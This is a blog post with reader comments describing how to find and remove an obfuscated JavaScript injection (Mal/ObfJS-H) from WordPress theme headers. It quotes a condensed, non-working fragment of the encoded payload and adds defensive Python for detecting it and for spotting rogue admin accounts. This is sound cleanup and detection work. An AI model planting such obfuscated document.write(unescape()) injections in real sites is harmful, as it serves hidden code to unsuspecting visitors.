Beware! Wordpress hackers are on the loose and it seems that you may be vulnerable. The Mal/ObfJS-H trojan is appearing on lots of Wordpress blogs and most people don’t know why or what to do. It’s not difficult to find or fix, as long as you know where to look…
This is screwed up!
OK, so I got a call from my cousin this morning telling me that visitors to his blog were receiving a trojan warning about Mal/ObfJS-H. Hmmm…that is totally weird. So I did a little bit of searching and found this article (dated today, by the way) talking about the fact that this has been happening to other people, particularly those with Wordpress blogs.
So I did a little bit of digging in his Wordpress blog and sure enough, there it was! A blatant hack into the header.php file of his Wordpress theme.
DAMN! I haven’t seen a hack this open in a long time. Now, I really don’t know much about it other than how to recognize it and how to remove it.
1) Mal/ObfJS-H Discovery
Assuming you have some kind of internet protection software, you should see a trojan error when you go to your blog. That is pretty obvious (but again, not all of us have that type of protection.)
2) Finding the Mal/ObfJS-H Trojan Code
It appears that the hacker puts this code just below the closing head tag </head> in the header.php file of your template. It is an obfuscated (percent-encoded) JavaScript routine that looks like a bunch of gobbledygook, as follows:
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61773%63%72%69%70%74%22%3E%66%75%6E%63%74…%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%…264C%261B%268E%261B%264D0tdsjqu%264F1'))</script>
This is a bit condensed. I didn’t really want to put the full code here. But realize that this does not appear in the standard view source code (at least it didn’t when I originally checked). I only discovered it when I looked at the header.php file in the Appearance Editor.
3) Finding and removing the hack
Within your Wordpress admin, choose “Editor” under the Appearance section on the left hand menu in Wordpress.

Then, in the right column, choose the header.php file…

Finally, in the main window, scroll down to the </head> tag and see if that ugly javascript routine exists. If so DELETE IT! You want to delete from the first <script> tag to the closing </script> tag (as kind of shown above).

That should do it! You may need to clear the cache on your web browser to no longer see the Mal/ObfJS-H trojan error, but hopefully this solves your problem (it did for us).
4) Prevention!
Again, I am not exactly sure who is doing this or why (probably a tracking cookie or maybe cookie stuffing), but my best advice to you is to make sure that all of the write permissions to your theme files are closed to anyone but the owner. (This is usually called a 755 permission.) Depending on your FTP product, cpanel, host management software, etc. this will be different, but it isn’t a bad thing to do right now. Again, that may be the problem, but who knows.
For now, just keep an eye on things and lock this down if you can. This is the second case I have heard of today.
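The steps above (look after </head> in header.php, cut the block from <script> to </script>, then tighten file permissions) can be automated. The script below is an added example, not code from this post or from WordPress: it decodes the unescape() payload without executing any JavaScript, flags and removes script blocks of that shape, and reports theme files that are group- or world-writable. The sample header and the percent-encoded payload are constructed here (the payload decodes to a placeholder tag pointing at the reserved domain example.invalid), so nothing in it is the real injected code.

```python
import os
import re
import stat

# Constructed sample only: the payload is built from a harmless placeholder tag
# (example.invalid is a reserved, non-resolving domain), so the decoded result
# is known in advance and none of this is the malware from the post.
PLACEHOLDER_DECODED = '<script src="http://example.invalid/x.js"></script>'
PLACEHOLDER_ENCODED = "".join("%%%02X" % ord(c) for c in PLACEHOLDER_DECODED)

SAMPLE_HEADER = f"""<html>
<head>
<title>Demo theme</title>
<script type="text/javascript">var legit = 1;</script>
</head>
<script language=javascript>document.write(unescape('{PLACEHOLDER_ENCODED}'))</script>
<body>
"""

# JavaScript unescape(): %XX for single bytes and %uXXXX for UTF-16 units.
_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
_SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
_WRITE_UNESCAPE = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*['\"]([^'\"]*)['\"]", re.I)


def decode_unescape(text):
    """Decode a JavaScript unescape() argument without running any JavaScript."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def find_injected_scripts(html):
    """Return every <script> after </head> that calls document.write(unescape(...)).

    Each finding carries the raw block, its offsets (for removal) and the decoded
    payload (for analysis). With no </head> present the whole file is scanned.
    """
    head_end = html.lower().find("</head>")
    start_at = 0 if head_end == -1 else head_end
    findings = []
    for m in _SCRIPT.finditer(html, start_at):
        call = _WRITE_UNESCAPE.search(m.group(1))
        if call:
            findings.append({
                "start": m.start(),
                "end": m.end(),
                "raw": m.group(0),
                "decoded": decode_unescape(call.group(1)),
            })
    return findings


def remove_injected_scripts(html):
    """Return html with each flagged block cut out, from <script> to </script>."""
    cleaned = html
    for f in reversed(find_injected_scripts(html)):  # right-to-left keeps offsets valid
        cleaned = cleaned[:f["start"]] + cleaned[f["end"]:]
    return cleaned


def insecure_mode(st_mode):
    """True if group or other has write permission (looser than 755 / 644)."""
    return bool(st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_file(path, st_mode, text):
    """Pure check for one file: returns a list of (path, issue) tuples."""
    issues = []
    if insecure_mode(st_mode):
        issues.append((path, "writable by group/other"))
    if path.endswith(".php"):
        for f in find_injected_scripts(text):
            issues.append((path, "injected script decodes to: " + f["decoded"]))
    return issues


def audit_theme_dir(theme_dir):
    """Walk a theme directory and run audit_file on everything in it."""
    issues = []
    for root, _dirs, files in os.walk(theme_dir):
        for name in files:
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                issues.extend(audit_file(path, os.stat(path).st_mode, fh.read()))
    return issues


if __name__ == "__main__":
    for f in find_injected_scripts(SAMPLE_HEADER):
        print("found:", f["raw"][:60] + "...")
        print("decodes to:", f["decoded"])
    print(remove_injected_scripts(SAMPLE_HEADER))
```

Run it against a theme directory with audit_theme_dir("/path/to/wp-content/themes/yourtheme"); decoding the payload first, rather than opening it in a browser, tells you where the injected script was loading from without running it.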
Gosh, don’t you love internet hacking? NOT!
cheers…matt
My name is Matthew Bredel and as of March, 2007, I am a full-time, work-at-home internet marketer.
Hey Matt,
If you still have the full text of the javascript you removed from the header, you can just copy it to a clean page, alter document.write to document.alert and open the page in a browser to find out what the obfuscated code actually says…
If you do, I’d love to know.
Thanks,
Steve
February 2nd, 2010 at 2:50 pm
Hey Matt,
Thanks for the heads up. I appreciate the easy to follow instructions!
~Maria
February 3rd, 2010 at 4:41 pm
Just helped a friend out with this same problem — a Dreamhost-ed Wordpress blog. I removed the malicious code but am eager to find out how to prevent its recurrence.
February 6th, 2010 at 7:06 pm
Thanks Matt! I worked for a couple of days trying to find the hacked code, then found it immediately after reading your post.
February 14th, 2010 at 12:45 pm
The same thing happened to me but I would say the story is not over. I checked my database table and the hacker added an administrator account.
I would check your users table and make sure that doesn’t exist. Also I would keep checking because if they had access as an admin they could have uploaded another script that would reopen their account if it was deleted.
February 15th, 2010 at 2:18 pm
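Brian's point about checking the users table, as an added example that is not from the post or any commenter: WordPress records a user's role in the usermeta table under the key {prefix}capabilities as a PHP-serialized array, so administrators can be listed with a join on that key. The code uses an in-memory SQLite stand-in for the MySQL tables, assumes the default wp_ prefix (configurable), and all rows are constructed, including the "wp_support" account standing in for one an attacker added.

```python
import sqlite3

# Constructed stand-in for the two WordPress tables that matter here (default wp_ prefix).
SCHEMA = """
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT,
                       user_email TEXT, user_registered TEXT);
CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                          meta_key TEXT, meta_value TEXT);
"""

# Constructed rows: the site owner, an editor, and an account the owner never created.
ROWS_USERS = [
    (1, "matt", "matt@example.invalid", "2009-06-01 10:00:00"),
    (2, "maria", "maria@example.invalid", "2009-09-12 08:30:00"),
    (3, "wp_support", "noreply@example.invalid", "2010-02-01 03:12:45"),
]
ROWS_META = [
    (1, 1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (2, 2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
    (3, 3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
]

# The serialized fragment WordPress writes for the administrator role.
ADMIN_MARKER = 's:13:"administrator";b:1;'


def build_sample_db():
    """Create the in-memory database with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?, ?)", ROWS_USERS)
    conn.executemany("INSERT INTO wp_usermeta VALUES (?, ?, ?, ?)", ROWS_META)
    return conn


def list_admins(conn, prefix="wp_"):
    """Every account whose capabilities meta contains the administrator role.

    `prefix` is the site's configured table prefix (trusted config, never user
    input); the actual values go through placeholders.
    """
    sql = (
        f"SELECT u.ID, u.user_login, u.user_email, u.user_registered "
        f"FROM {prefix}users u JOIN {prefix}usermeta m ON m.user_id = u.ID "
        f"WHERE m.meta_key = ? AND m.meta_value LIKE ? ORDER BY u.ID"
    )
    rows = conn.execute(sql, (prefix + "capabilities", "%" + ADMIN_MARKER + "%"))
    return [dict(zip(("id", "login", "email", "registered"), r)) for r in rows]


def unexpected_admins(conn, known_logins, prefix="wp_"):
    """Administrators whose login is not on the owner's list of expected accounts."""
    known = {login.lower() for login in known_logins}
    return [a for a in list_admins(conn, prefix) if a["login"].lower() not in known]


if __name__ == "__main__":
    db = build_sample_db()
    for admin in unexpected_admins(db, ["matt"]):
        print("unexpected administrator:", admin["login"],
              "registered", admin["registered"])
```

Against a real site, point sqlite3 at a dump imported locally or swap the connection for your MySQL client; the query itself is the same. Deleting the account is not enough on its own, as Brian notes, so also review recently modified files in wp-content for anything that could recreate it.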
Hey Brian,
OK, that sounds scary (and something I did not think about)! I will definitely go back and look at this. Thanks for the heads up!
cheers…matt
February 15th, 2010 at 2:54 pm
I’m getting a URL:mal error in my site - problem is I can’t access my editor - my dashboard is experiencing problems - any suggestions?
May 12th, 2010 at 7:57 am
Says the one who used to show up ridiculously early to work hehehehe…
January 4th, 2012 at 11:26 pm